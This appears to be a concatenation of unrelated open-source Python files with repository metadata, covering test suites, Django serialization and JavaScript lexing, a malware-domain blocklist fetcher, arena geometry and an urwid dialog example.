with open(path, 'a') as f:
f.write(data)
def _LoadAllEvents(self):
"""Loads all events in the watcher."""
for _ in self._watcher.Load():
pass
def assertWatcherYields(self, values):
self.assertEqual(list(self._watcher.Load()), values)
def testRaisesWithBadArguments(self):
with self.assertRaises(ValueError):
directory_watcher.DirectoryWatcher(None, lambda x: None)
with self.assertRaises(ValueError):
directory_watcher.DirectoryWatcher('dir', None)
def testEmptyDirectory(self):
self.assertWatcherYields([])
def testSingleWrite(self):
self._WriteToFile('a', 'abc')
self.assertWatcherYields(['a', 'b', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testMultipleWrites(self):
self._WriteToFile('a', 'abc')
self.assertWatcherYields(['a', 'b', 'c'])
self._WriteToFile('a', 'xyz')
self.assertWatcherYields(['x', 'y', 'z'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testMultipleLoads(self):
self._WriteToFile('a', 'a')
self._watcher.Load()
self._watcher.Load()
self.assertWatcherYields(['a'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testMultipleFilesAtOnce(self):
self._WriteToFile('b', 'b')
self._WriteToFile('a', 'a')
self.assertWatcherYields(['a', 'b'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testFinishesLoadingFileWhenSwitchingToNewFile(self):
self._WriteToFile('a', 'a')
# Empty the iterator.
self.assertEquals(['a'], list(self._watcher.Load()))
self._WriteToFile('a', 'b')
self._WriteToFile('b', 'c')
# The watcher should finish its current file before starting a new one.
self.assertWatcherYields(['b', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testIntermediateEmptyFiles(self):
self._WriteToFile('a', 'a')
self._WriteToFile('b', '')
self._WriteToFile('c', 'c')
self.assertWatcherYields(['a', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testPathFilter(self):
self._watcher = directory_watcher.DirectoryWatcher(
self._directory, _ByteLoader,
lambda path: 'do_not_watch_me' not in path)
self._WriteToFile('a', 'a')
self._WriteToFile('do_not_watch_me', 'b')
self._WriteToFile('c', 'c')
self.assertWatcherYields(['a', 'c'])
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testDetectsNewOldFiles(self):
self._WriteToFile('b', 'a')
self._LoadAllEvents()
self._WriteToFile('a', 'a')
self._LoadAllEvents()
self.assertTrue(self._watcher.OutOfOrderWritesDetected())
def testIgnoresNewerFiles(self):
self._WriteToFile('a', 'a')
self._LoadAllEvents()
self._WriteToFile('q', 'a')
self._LoadAllEvents()
self.assertFalse(self._watcher.OutOfOrderWritesDetected())
def testDetectsChangingOldFiles(self):
self._WriteToFile('a', 'a')
self._WriteToFile('b', 'a')
self._LoadAllEvents()
self._WriteToFile('a', 'c')
self._LoadAllEvents()
self.assertTrue(self._watcher.OutOfOrderWritesDetected())
def testDoesntCrashWhenFileIsDeleted(self):
self._WriteToFile('a', 'a')
self._LoadAllEvents()
os.remove(os.path.join(self._directory, 'a'))
self._WriteToFile('b', 'b')
self.assertWatcherYields(['b'])
if __name__ == '__main__':
googletest.main()
|
marcoantoniooliveira/labweb
|
refs/heads/master
|
oscar/lib/python2.7/site-packages/jinja2/testsuite/__init__.py
|
404
|
# -*- coding: utf-8 -*-
"""
jinja2.testsuite
~~~~~~~~~~~~~~~~
All the unittests of Jinja2. These tests can be executed by
either running run-tests.py using multiple Python versions at
the same time.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import os
import re
import sys
import unittest
from traceback import format_exception
from jinja2 import loaders
from jinja2._compat import PY2
here = os.path.dirname(os.path.abspath(__file__))
dict_loader = loaders.DictLoader({
'justdict.html': 'FOO'
})
package_loader = loaders.PackageLoader('jinja2.testsuite.res', 'templates')
filesystem_loader = loaders.FileSystemLoader(here + '/res/templates')
function_loader = loaders.FunctionLoader({'justfunction.html': 'FOO'}.get)
choice_loader = loaders.ChoiceLoader([dict_loader, package_loader])
prefix_loader = loaders.PrefixLoader({
'a': filesystem_loader,
'b': dict_loader
})
class JinjaTestCase(unittest.TestCase):
### use only these methods for testing. If you need standard
### unittest method, wrap them!
def setup(self):
pass
def teardown(self):
pass
def setUp(self):
self.setup()
def tearDown(self):
self.teardown()
def assert_equal(self, a, b):
return self.assertEqual(a, b)
def assert_raises(self, *args, **kwargs):
return self.assertRaises(*args, **kwargs)
def assert_traceback_matches(self, callback, expected_tb):
try:
callback()
except Exception as e:
tb = format_exception(*sys.exc_info())
if re.search(expected_tb.strip(), ''.join(tb)) is None:
raise self.fail('Traceback did not match:\n\n%s\nexpected:\n%s'
% (''.join(tb), expected_tb))
else:
self.fail('Expected exception')
def find_all_tests(suite):
"""Yields all the tests and their names from a given suite."""
suites = [suite]
while suites:
s = suites.pop()
try:
suites.extend(s)
except TypeError:
yield s, '%s.%s.%s' % (
s.__class__.__module__,
s.__class__.__name__,
s._testMethodName
)
class BetterLoader(unittest.TestLoader):
"""A nicer loader that solves two problems. First of all we are setting
up tests from different sources and we're doing this programmatically
which breaks the default loading logic so this is required anyways.
Secondly this loader has a nicer interpolation for test names than the
default one so you can just do ``run-tests.py ViewTestCase`` and it
will work.
"""
def getRootSuite(self):
return suite()
def loadTestsFromName(self, name, module=None):
root = self.getRootSuite()
if name == 'suite':
return root
all_tests = []
for testcase, testname in find_all_tests(root):
if testname == name or \
testname.endswith('.' + name) or \
('.' + name + '.') in testname or \
testname.startswith(name + '.'):
all_tests.append(testcase)
if not all_tests:
raise LookupError('could not find test case for "%s"' % name)
if len(all_tests) == 1:
return all_tests[0]
rv = unittest.TestSuite()
for test in all_tests:
rv.addTest(test)
return rv
def suite():
from jinja2.testsuite import ext, filters, tests, core_tags, \
loader, inheritance, imports, lexnparse, security, api, \
regression, debug, utils, bytecode_cache, doctests
suite = unittest.TestSuite()
suite.addTest(ext.suite())
suite.addTest(filters.suite())
suite.addTest(tests.suite())
suite.addTest(core_tags.suite())
suite.addTest(loader.suite())
suite.addTest(inheritance.suite())
suite.addTest(imports.suite())
suite.addTest(lexnparse.suite())
suite.addTest(security.suite())
suite.addTest(api.suite())
suite.addTest(regression.suite())
suite.addTest(debug.suite())
suite.addTest(utils.suite())
suite.addTest(bytecode_cache.suite())
# doctests will not run on python 3 currently. Too many issues
# with that, do not test that on that platform.
if PY2:
suite.addTest(doctests.suite())
return suite
def main():
"""Runs the testsuite as command line application."""
try:
unittest.main(testLoader=BetterLoader(), defaultTest='suite')
except Exception as e:
print('Error: %s' % e)
|
drasko/codezero
|
refs/heads/master
|
scripts/baremetal/baremetal_add_container.py
|
3
|
#! /usr/bin/env python2.6
# -*- mode: python; coding: utf-8; -*-
#
# Script to add/remove project to baremetal
# menu of main screen
#
# This script should be called from project root directory
#
import os, sys, shutil, re
PROJRELROOT = '../../'
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), PROJRELROOT)))
from optparse import OptionParser
from os.path import join
from shutil import copytree
from scripts.config.projpaths import *
def parse_cmdline_options():
usage = "usage: %prog [options] arg"
parser = OptionParser(usage)
parser.add_option("-a", "--add", action = "store_true", default = False,
dest = "addproject", help = "Add new project to baremetal projects")
parser.add_option("-d", "--del", action = "store_true", default = False,
dest = "delproject", help = "Delete existing project from baremetal projects")
parser.add_option("-i", "--desc", type = "string", dest = "projdesc",
help = "Description of new project to be added")
parser.add_option("-s", "--src", type = "string", dest = "srcpath",
help = "With -a, Source directory for new project to be added \
With -d, Source directory of baremetal project to be deleted")
(options, args) = parser.parse_args()
# Sanity checks
if (not options.addproject and not options.delproject) or \
(options.addproject and options.delproject):
parser.error("Only one of -a or -d needed, use -h argument for help")
exit()
if options.addproject:
add_del = 1
if not options.projdesc or not options.srcpath:
parser.error("--desc or --src missing, use -h argument for help")
exit()
if options.delproject:
add_del = 0
if options.projdesc or not options.srcpath:
parser.error("--desc provided or --src missing with -d, use -h argument for help")
exit()
return options.projdesc, options.srcpath, add_del
def container_cml_templ_del_symbl(projname):
cont_templ = "config/cml/container_ruleset.template"
sym = "CONT%(cn)d_BAREMETAL_PROJ_" + projname.upper()
buffer = ""
with open(cont_templ, 'r') as fin:
exist = False
# Prepare buffer for new cont_templ with new project symbols added
for line in fin:
parts = line.split()
# Find out where baremetal symbols start in cont_templ
if len(parts) > 1 and parts[0] == sym:
exist = True
continue
elif len(parts) == 1 and parts[0] == sym:
continue
buffer += line
if exist == False:
print "Baremetal project named " + projname + " does not exist"
exit()
# Write new cont_templ
with open(cont_templ, 'w+') as fout:
fout.write(buffer)
def container_cml_templ_add_symbl(projdesc, projname):
cont_templ = "config/cml/container_ruleset.template"
pattern = re.compile("(CONT\%\(cn\)d_BAREMETAL_PROJ_)(.*)")
baremetal_name_templ = "CONT%(cn)d_BAREMETAL_PROJ_"
new_sym = baremetal_name_templ + projname.upper()
buffer = ""
with open(cont_templ, 'r') as fin:
baremetal_sym_found = False
last_baremetal_proj = ""
# Prepare buffer for new cont_templ with new project symbols added
for line in fin:
parts = line.split()
# Find out where baremetal symbols start in cont_templ
if len(parts) > 1 and re.match(pattern, parts[0]):
baremetal_sym_found = True
# Find the name of last baremetal project already present in list
last_baremetal_proj = parts[0][len(baremetal_name_templ):]
# We are done with baremetal symbols, add new symbol to buffer
elif baremetal_sym_found == True:
baremetal_sym_found = False
sym_def = new_sym + "\t\'" + projdesc + "\'\n"
buffer += sym_def
# Search for baremetal menu and add new project symbol
elif len(parts) == 1 and \
parts[0] == baremetal_name_templ + last_baremetal_proj:
sym_reference = "\t" + new_sym + "\n"
line += sym_reference
buffer += line
# Write new cont_templ
with open(cont_templ, 'w+') as fout:
fout.write(buffer)
def add_project(projdesc, srcdir, projname):
container_cml_templ_add_symbl(projdesc, projname)
baremetal_dir = "conts/baremetal"
dest_dir = join(baremetal_dir, projname)
print "Copying source files from " + srcdir + " to " + dest_dir
shutil.copytree(srcdir, dest_dir)
print "Done, New baremetal project " + projname + \
" is ready to be used."
def del_project(srcdir, projname):
container_cml_templ_del_symbl(projname)
baremetal_dir = "conts/baremetal"
src_dir = join(baremetal_dir, projname)
print "Deleting source files from " + src_dir
shutil.rmtree(src_dir, "ignore_errors")
print "Done.."
def main():
projdesc, srcdir, add_del = parse_cmdline_options()
# Get the base directory
projpath, projname = os.path.split(srcdir)
# Python's basename() doesnot work fine if path ends with /,
# so we need to manually correct this
if projname == "":
projpath, projname = os.path.split(projpath)
if add_del == 1:
add_project(projdesc, srcdir, projname)
else:
del_project(srcdir, projname)
# Delete the config.cml file, so that user can see new projects
os.system("rm -f " + CML2_CONFIG_FILE)
if __name__ == "__main__":
main()
|
GhostThrone/django
|
refs/heads/master
|
django/utils/jslex.py
|
335
|
"""JsLex: a lexer for Javascript"""
# Originally from https://bitbucket.org/ned/jslex
from __future__ import unicode_literals
import re
class Tok(object):
"""
A specification for a token class.
"""
num = 0
def __init__(self, name, regex, next=None):
self.id = Tok.num
Tok.num += 1
self.name = name
self.regex = regex
self.next = next
def literals(choices, prefix="", suffix=""):
"""
Create a regex from a space-separated list of literal `choices`.
If provided, `prefix` and `suffix` will be attached to each choice
individually.
"""
return "|".join(prefix + re.escape(c) + suffix for c in choices.split())
class Lexer(object):
"""
A generic multi-state regex-based lexer.
"""
def __init__(self, states, first):
self.regexes = {}
self.toks = {}
for state, rules in states.items():
parts = []
for tok in rules:
groupid = "t%d" % tok.id
self.toks[groupid] = tok
parts.append("(?P<%s>%s)" % (groupid, tok.regex))
self.regexes[state] = re.compile("|".join(parts), re.MULTILINE | re.VERBOSE)
self.state = first
def lex(self, text):
"""
Lexically analyze `text`.
Yields pairs (`name`, `tokentext`).
"""
end = len(text)
state = self.state
regexes = self.regexes
toks = self.toks
start = 0
while start < end:
for match in regexes[state].finditer(text, start):
name = match.lastgroup
tok = toks[name]
toktext = match.group(name)
start += len(toktext)
yield (tok.name, toktext)
if tok.next:
state = tok.next
break
self.state = state
class JsLexer(Lexer):
"""
A Javascript lexer
>>> lexer = JsLexer()
>>> list(lexer.lex("a = 1"))
[('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]
This doesn't properly handle non-ASCII characters in the Javascript source.
"""
# Because these tokens are matched as alternatives in a regex, longer
# possibilities must appear in the list before shorter ones, for example,
# '>>' before '>'.
#
# Note that we don't have to detect malformed Javascript, only properly
# lex correct Javascript, so much of this is simplified.
# Details of Javascript lexical structure are taken from
# http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf
# A useful explanation of automatic semicolon insertion is at
# http://inimino.org/~inimino/blog/javascript_semicolons
both_before = [
Tok("comment", r"/\*(.|\n)*?\*/"),
Tok("linecomment", r"//.*?$"),
Tok("ws", r"\s+"),
Tok("keyword", literals("""
break case catch class const continue debugger
default delete do else enum export extends
finally for function if import in instanceof
new return super switch this throw try typeof
var void while with
""", suffix=r"\b"), next='reg'),
Tok("reserved", literals("null true false", suffix=r"\b"), next='div'),
Tok("id", r"""
([a-zA-Z_$ ]|\\u[0-9a-fA-Z]{4}) # first char
([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})* # rest chars
""", next='div'),
Tok("hnum", r"0[xX][0-9a-fA-F]+", next='div'),
Tok("onum", r"0[0-7]+"),
Tok("dnum", r"""
( (0|[1-9][0-9]*) # DecimalIntegerLiteral
\. # dot
[0-9]* # DecimalDigits-opt
([eE][-+]?[0-9]+)? # ExponentPart-opt
|
\. # dot
[0-9]+ # DecimalDigits
([eE][-+]?[0-9]+)? # ExponentPart-opt
|
(0|[1-9][0-9]*) # DecimalIntegerLiteral
([eE][-+]?[0-9]+)? # ExponentPart-opt
)
""", next='div'),
Tok("punct", literals("""
>>>= === !== >>> <<= >>= <= >= == != << >> &&
|| += -= *= %= &= |= ^=
"""), next="reg"),
Tok("punct", literals("++ -- ) ]"), next='div'),
Tok("punct", literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
Tok("string", r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
Tok("string", r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
]
both_after = [
Tok("other", r"."),
]
states = {
# slash will mean division
'div': both_before + [
Tok("punct", literals("/= /"), next='reg'),
] + both_after,
# slash will mean regex
'reg': both_before + [
Tok("regex",
r"""
/ # opening slash
# First character is..
( [^*\\/[] # anything but * \ / or [
| \\. # or an escape sequence
| \[ # or a class, which has
( [^\]\\] # anything but \ or ]
| \\. # or an escape sequence
)* # many times
\]
)
# Following characters are same, except for excluding a star
( [^\\/[] # anything but \ / or [
| \\. # or an escape sequence
| \[ # or a class, which has
( [^\]\\] # anything but \ or ]
| \\. # or an escape sequence
)* # many times
\]
)* # many times
/ # closing slash
[a-zA-Z0-9]* # trailing flags
""", next='div'),
] + both_after,
}
def __init__(self):
super(JsLexer, self).__init__(self.states, 'reg')
def prepare_js_for_gettext(js):
"""
Convert the Javascript source `js` into something resembling C for
xgettext.
What actually happens is that all the regex literals are replaced with
"REGEX".
"""
def escape_quotes(m):
"""Used in a regex to properly escape double quotes."""
s = m.group(0)
if s == '"':
return r'\"'
else:
return s
lexer = JsLexer()
c = []
for name, tok in lexer.lex(js):
if name == 'regex':
# C doesn't grok regexes, and they aren't needed for gettext,
# so just output a string instead.
tok = '"REGEX"'
elif name == 'string':
# C doesn't have single-quoted strings, so make all strings
# double-quoted.
if tok.startswith("'"):
guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1])
tok = '"' + guts + '"'
elif name == 'id':
# C can't deal with Unicode escapes in identifiers. We don't
# need them for gettext anyway, so replace them with something
# innocuous
tok = tok.replace("\\", "U")
c.append(tok)
return ''.join(c)
|
JustF0rWork/malware
|
refs/heads/master
|
trails/feeds/feodotrackerdns.py
|
1
|
#!/usr/bin/env python
"""
Copyright (c) 2014-2016 Miroslav Stampar (@stamparm)
See the file 'LICENSE' for copying permission
"""
from core.common import retrieve_content
__url__ = "https://feodotracker.abuse.ch/blocklist/?download=domainblocklist"
__check__ = "Feodo"
__info__ = "feodo (malware)"
__reference__ = "abuse.ch"
def fetch():
retval = {}
content = retrieve_content(__url__)
if __check__ in content:
for line in content.split('\n'):
line = line.strip()
if not line or line.startswith('#'):
continue
retval[line] = (__info__, __reference__)
return retval
|
MattNolanLab/gridcells
|
refs/heads/master
|
gridcells/core/arena.py
|
2
|
'''
==============================================
:mod:`gridcells.core.arena` - Defining arenas
==============================================
The :mod:`~gridcells.core.arena` module provides class definitions of arenas. These
can subsequently be used as input to process spiking data and generate spatial
firing fields/autocorrelations.
These types of arenas are currently defined:
--------------------------------------------
.. autosummary::
Arena
CircularArena
RectangularArena
SquareArena
'''
from __future__ import absolute_import, print_function, division
import numpy as np
from .common import Pair2D
##############################################################################
class Arena(object):
'''An abstract class for arenas.
This class is an interface for obtaining discretisations of the arenas and
masks when the shape is not rectangular.
'''
def getDiscretisation(self):
'''Obtain the discretisation of this arena.
Returns
=======
d : gridcells.core.Pair2D
A pair of x and y coordinates for the positions in the arena. Units
are arbitrary.
'''
raise NotImplementedError()
def getMask(self):
'''Return mask (a 2D ``np.ndarray``) of where the positions in the
arena are valid.
For isntance with a circular arena, all positions outside its radius
are invalid.
'''
raise NotImplementedError()
class RectangularArena(Arena):
'''A rectangular arena.
Use :class:`~gridcells.core.RectangularArena` when you need to work with
rectangular arenas.
.. note::
The origin (0, 0) of the coordinate system in all the arenas is in the
bottom-left corner of the arena.
'''
def __init__(self, size, discretisation):
self._sz = size
self._q = discretisation
def getDiscretisation(self):
numX = self._sz.x / self._q.x + 1
numY = self._sz.y / self._q.y + 1
xedges = np.linspace(0., self._sz.x, numX)
yedges = np.linspace(0., self._sz.y, numY)
return Pair2D(xedges, yedges)
def getDiscretisationSteps(self):
return self._q
def getMask(self):
return None
def getSize(self):
return self._sz
@property
def sz(self):
'''Return the size of the arena. Equivalent to
:meth:`~RectangularArena.getSize`.
'''
return self._sz
@property
def bounds(self):
return Pair2D(
(0., self._sz.x),
(0., self._sz.y)
)
class SquareArena(RectangularArena):
'''A square arena.'''
def __init__(self, size, discretisation):
tmpSz = Pair2D(size, size)
super(SquareArena, self).__init__(tmpSz, discretisation)
class CircularArena(SquareArena):
'''A circular arena.'''
def __init__(self, radius, discretisation):
super(CircularArena, self).__init__(radius*2., discretisation)
self.radius = radius
def getMask(self):
edges = self.getDiscretisation()
X, Y = np.meshgrid(edges.x, edges.y)
return np.sqrt(X**2 + Y**2) > self.radius
|
krishna-pandey-git/django
|
refs/heads/master
|
django/core/serializers/python.py
|
140
|
"""
A Python "serializer". Doesn't do much serializing per se -- just converts to
and from basic Python data types (lists, dicts, strings, etc.). Useful as a basis for
other serializers.
"""
from __future__ import unicode_literals
from collections import OrderedDict
from django.apps import apps
from django.conf import settings
from django.core.serializers import base
from django.db import DEFAULT_DB_ALIAS, models
from django.utils import six
from django.utils.encoding import force_text, is_protected_type
class Serializer(base.Serializer):
"""
Serializes a QuerySet to basic Python objects.
"""
internal_use_only = True
def start_serialization(self):
self._current = None
self.objects = []
def end_serialization(self):
pass
def start_object(self, obj):
self._current = OrderedDict()
def end_object(self, obj):
self.objects.append(self.get_dump_object(obj))
self._current = None
def get_dump_object(self, obj):
model = obj._meta.proxy_for_model if obj._deferred else obj.__class__
data = OrderedDict([('model', force_text(model._meta))])
if not self.use_natural_primary_keys or not hasattr(obj, 'natural_key'):
data["pk"] = force_text(obj._get_pk_val(), strings_only=True)
data['fields'] = self._current
return data
def handle_field(self, obj, field):
value = field.value_from_object(obj)
# Protected types (i.e., primitives like None, numbers, dates,
# and Decimals) are passed through as is. All other values are
# converted to string first.
if is_protected_type(value):
self._current[field.name] = value
else:
self._current[field.name] = field.value_to_string(obj)
def handle_fk_field(self, obj, field):
if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
related = getattr(obj, field.name)
if related:
value = related.natural_key()
else:
value = None
else:
value = getattr(obj, field.get_attname())
if not is_protected_type(value):
value = field.value_to_string(obj)
self._current[field.name] = value
def handle_m2m_field(self, obj, field):
if field.remote_field.through._meta.auto_created:
if self.use_natural_foreign_keys and hasattr(field.remote_field.model, 'natural_key'):
m2m_value = lambda value: value.natural_key()
else:
m2m_value = lambda value: force_text(value._get_pk_val(), strings_only=True)
self._current[field.name] = [m2m_value(related)
for related in getattr(obj, field.name).iterator()]
def getvalue(self):
return self.objects
def Deserializer(object_list, **options):
"""
Deserialize simple Python objects back into Django ORM instances.
It's expected that you pass the Python objects themselves (instead of a
stream or a string) to the constructor
"""
db = options.pop('using', DEFAULT_DB_ALIAS)
ignore = options.pop('ignorenonexistent', False)
for d in object_list:
# Look up the model and starting build a dict of data for it.
try:
Model = _get_model(d["model"])
except base.DeserializationError:
if ignore:
continue
else:
raise
data = {}
if 'pk' in d:
try:
data[Model._meta.pk.attname] = Model._meta.pk.to_python(d.get('pk'))
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), None)
m2m_data = {}
field_names = {f.name for f in Model._meta.get_fields()}
# Handle each field
for (field_name, field_value) in six.iteritems(d["fields"]):
if ignore and field_name not in field_names:
# skip fields no longer on model
continue
if isinstance(field_value, str):
field_value = force_text(
field_value, options.get("encoding", settings.DEFAULT_CHARSET), strings_only=True
)
field = Model._meta.get_field(field_name)
# Handle M2M relations
if field.remote_field and isinstance(field.remote_field, models.ManyToManyRel):
if hasattr(field.remote_field.model._default_manager, 'get_by_natural_key'):
def m2m_convert(value):
if hasattr(value, '__iter__') and not isinstance(value, six.text_type):
return field.remote_field.model._default_manager.db_manager(db).get_by_natural_key(*value).pk
else:
return force_text(field.remote_field.model._meta.pk.to_python(value), strings_only=True)
else:
m2m_convert = lambda v: force_text(field.remote_field.model._meta.pk.to_python(v), strings_only=True)
try:
m2m_data[field.name] = []
for pk in field_value:
m2m_data[field.name].append(m2m_convert(pk))
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), pk)
# Handle FK fields
elif field.remote_field and isinstance(field.remote_field, models.ManyToOneRel):
if field_value is not None:
try:
if hasattr(field.remote_field.model._default_manager, 'get_by_natural_key'):
if hasattr(field_value, '__iter__') and not isinstance(field_value, six.text_type):
obj = field.remote_field.model._default_manager.db_manager(db).get_by_natural_key(*field_value)
value = getattr(obj, field.remote_field.field_name)
# If this is a natural foreign key to an object that
# has a FK/O2O as the foreign key, use the FK value
if field.remote_field.model._meta.pk.remote_field:
value = value.pk
else:
value = field.remote_field.model._meta.get_field(field.remote_field.field_name).to_python(field_value)
data[field.attname] = value
else:
data[field.attname] = field.remote_field.model._meta.get_field(field.remote_field.field_name).to_python(field_value)
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)
else:
data[field.attname] = None
# Handle all other fields
else:
try:
data[field.name] = field.to_python(field_value)
except Exception as e:
raise base.DeserializationError.WithData(e, d['model'], d.get('pk'), field_value)
obj = base.build_instance(Model, data, db)
yield base.DeserializedObject(obj, m2m_data)
def _get_model(model_identifier):
"""
Helper to look up a model from an "app_label.model_name" string.
"""
try:
return apps.get_model(model_identifier)
except (LookupError, TypeError):
raise base.DeserializationError("Invalid model identifier: '%s'" % model_identifier)
|
hkoof/urwid
|
refs/heads/master
|
examples/dialog.py
|
4
|
#!/usr/bin/python
#
# Urwid example similar to dialog(1) program
# Copyright (C) 2004-2009 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
"""
Urwid example similar to dialog(1) program
"""
import sys
import urwid
class DialogExit(Exception):
pass
class DialogDisplay:
palette = [
('body','black','light gray', 'standout'),
('border','black','dark blue'),
('shadow','white','black'),
('selectable','black', 'dark cyan'),
('focus','white','dark blue','bold'),
('focustext','light gray','dark blue'),
]
def __init__(self, text, height, width, body=None):
width = int(width)
if width <= 0:
width = ('relative', 80)
height = int(height)
if height <= 0:
height = ('relative', 80)
self.body = body
if body is None:
# fill space with nothing
body = urwid.Filler(urwid.Divider(),'top')
self.frame = urwid.Frame( body, focus_part='footer')
if text is not None:
self.frame.header = urwid.Pile( [urwid.Text(text),
urwid.Divider()] )
w = self.frame
# pad area around listbox
w = urwid.Padding(w, ('fixed left',2), ('fixed right',2))
w = urwid.Filler(w, ('fixed top',1), ('fixed bottom',1))
w = urwid.AttrWrap(w, 'body')
# "shadow" effect
w = urwid.Columns( [w,('fixed', 2, urwid.AttrWrap(
urwid.Filler(urwid.Text(('border',' ')), "top")
,'shadow'))])
w = urwid.Frame( w, footer =
urwid.AttrWrap(urwid.Text(('border',' ')),'shadow'))
# outermost border area
w = urwid.Padding(w, 'center', width )
w = urwid.Filler(w, 'middle', height )
w = urwid.AttrWrap( w, 'border' )
self.view = w
def add_buttons(self, buttons):
l = []
for name, exitcode in buttons:
b = urwid.Button( name, self.button_press )
b.exitcode = exitcode
b = urwid.AttrWrap( b, 'selectable','focus' )
l.append( b )
self.buttons = urwid.GridFlow(l, 10, 3, 1, 'center')
self.frame.footer = urwid.Pile( [ urwid.Divider(),
self.buttons ], focus_item = 1)
def button_press(self, button):
raise DialogExit(button.exitcode)
def main(self):
self.loop = urwid.MainLoop(self.view, self.palette)
try:
self.loop.run()
except DialogExit, e:
return self.on_exit( e.args[0] )
def on_exit(self, exitcode):
return exitcode, ""
class InputDialogDisplay(DialogDisplay):
def __init__(self, text, height, width):
self.edit = urwid.Edit()
body = urwid.ListBox([self.edit])
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, text, height, width, body)
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.view.keypress( size, k )
def on_exit(self, exitcode):
return exitcode, self.edit.get_edit_text()
class TextDialogDisplay(DialogDisplay):
def __init__(self, file, height, width):
l = []
# read the whole file (being slow, not lazy this time)
for line in open(file).readlines():
l.append( urwid.Text( line.rstrip() ))
body = urwid.ListBox(l)
body = urwid.AttrWrap(body, 'selectable','focustext')
DialogDisplay.__init__(self, None, height, width, body)
def unhandled_key(self, size, k):
if k in ('up','page up','down','page down'):
self.frame.set_focus('body')
self.view.keypress( size, k )
self.frame.set_focus('footer')
class ListDialogDisplay(DialogDisplay):
def __init__(self, text, height, width, constr, items, has_default):
j = []
if has_default:
k, tail = 3, ()
else:
k, tail = 2, ("no",)
while items:
j.append( items[:k] + tail )
items = items[k:]
l = []
self.items = []
for tag, item, default in j:
w = constr( tag, default=="on" )
self.items.append(w)
w = urwid.Columns( [('fixed', 12, w),
urwid.Text(item)], 2 )
w = urwid.AttrWrap(w, 'selectable','focus')
l.append(w)
lb = urwid.ListBox(l)
lb = urwid.AttrWrap( lb, "selectable" )
DialogDisplay.__init__(self, text, height, width, lb )
self.frame.set_focus('body')
def unhandled_key(self, size, k):
if k in ('up','page up'):
self.frame.set_focus('body')
if k in ('down','page down'):
self.frame.set_focus('footer')
if k == 'enter':
# pass enter to the "ok" button
self.frame.set_focus('footer')
self.buttons.set_focus(0)
self.view.keypress( size, k )
def on_exit(self, exitcode):
"""Print the tag of the item selected."""
if exitcode != 0:
return exitcode, ""
s = ""
for i in self.items:
if i.get_state():
s = i.get_label()
break
return exitcode, s
class CheckListDialogDisplay(ListDialogDisplay):
def on_exit(self, exitcode):
"""
Mimic dialog(1)'s --checklist exit.
Put each checked item in double quotes with a trailing space.
"""
if exitcode != 0:
return exitcode, ""
l = []
for i in self.items:
if i.get_state():
l.append(i.get_label())
return exitcode, "".join(['"'+tag+'" ' for tag in l])
class MenuItem(urwid.Text):
"""A custom widget for the --menu option"""
def __init__(self, label):
urwid.Text.__init__(self, label)
self.state = False
def selectable(self):
return True
def keypress(self,size,key):
if key == "enter":
self.state = True
raise DialogExit, 0
return key
def mouse_event(self,size,event,button,col,row,focus):
if event=='mouse release':
self.state = True
raise DialogExit, 0
return False
def get_state(self):
return self.state
def get_label(self):
text, attr = self.get_text()
return text
def do_checklist(text, height, width, list_height, *items):
def constr(tag, state):
return urwid.CheckBox(tag, state)
d = CheckListDialogDisplay( text, height, width, constr, items, True)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_inputbox(text, height, width):
d = InputDialogDisplay( text, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_menu(text, height, width, menu_height, *items):
def constr(tag, state ):
return MenuItem(tag)
d = ListDialogDisplay(text, height, width, constr, items, False)
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_msgbox(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("OK", 0) ])
return d
def do_radiolist(text, height, width, list_height, *items):
radiolist = []
def constr(tag, state, radiolist=radiolist):
return urwid.RadioButton(radiolist, tag, state)
d = ListDialogDisplay( text, height, width, constr, items, True )
d.add_buttons([ ("OK", 0), ("Cancel", 1) ])
return d
def do_textbox(file, height, width):
d = TextDialogDisplay( file, height, width )
d.add_buttons([ ("Exit", 0) ])
return d
def do_yesno(text, height, width):
d = DialogDisplay( text, height, width )
d.add_buttons([ ("Yes", 0), ("No", 1) ])
return d
MODES={ '--checklist': (do_checklist,
"text height width list-height [ tag item status ] ..."),
'--inputbox': (do_inputbox,
"text height width"),
'--menu': (do_menu,
"text height width menu-height [ tag item ] ..."),
'--msgbox': (do_msgbox,
"text height width"),
